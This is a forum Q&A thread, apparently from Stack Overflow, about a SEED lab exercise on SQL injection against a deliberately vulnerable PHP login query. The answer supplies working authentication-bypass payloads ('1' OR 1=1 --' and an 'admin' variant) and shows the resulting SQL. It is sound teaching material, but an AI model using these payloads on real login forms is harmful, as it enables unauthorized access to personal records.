# How to do sql injection in seed lab

Tags: php, sql, sql-injection

So I'm relatively new to SQL programming and we are asked in our lab to inject a statement into the employee ID field of a website based off the following code: I think the answer would be to just type 1=1 name = "admin" however this doesn't seem to work.

```
conn = getDB();
$sql = "SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= ’$input_eid’ and password=’$input_pwd’";
$result = $conn->query($sql))
// The following is psuedo code
if(name==’admin’){
return All employees information.
} else if(name!=NULL){
return employee information.
} else {
authentication fails.
}
```

Comment: I recommend seeing: https://www.youtube.com/watch?v=ciNHn38EyRc

Comment: that code is 100% safe, as it has syntax errors in it

Answer (score 1):

One way to inject SQL here would be to inject a condition that would always be true to the userId and comment out the condition dealing with the password.

E.g., consider the following:

```
$input_eid = "1' OR 1=1 --";
$input_pwd = "does not matter";
```

This should generate the following SQL:

```
SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= '1' OR 1=1 -- and password='does not matter'
```

As you can see, this query would clearly return all the rows in the database, regardless of the password you're injecting.

**EDIT:**

As per the clarification of the requirements in the comment below, you can substitute the "OR 1=1" part with `name='admin'` to get the admin's details. Just make sure to start off with something that isn't a valid id so you don't get its details by mistake. E.g., consider the following:

```
$input_eid = " ' OR name='admin' --";
$input_pwd = "does not matter";
```

You'd get the following SQL, which will query the admin's details:

```
SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= ' ' OR name='admin' --' and password='does not matter'
```

Comment: So all you have to do to inject is type "1' OR 1=1 --"; into the employee id field and this will make password field irrelevant?

Comment: @JohnW assuming there's no input sanitizing anywhere in between, yes, that should do it.

Comment: I understand how this works now but it does not seem to work as intended. Here's the full question  We assume that you do know the administrator’s account name which is admin, but you do not know the ID or the password. You need to decide what to type in the Employee ID and Password fields to succeed in the attack.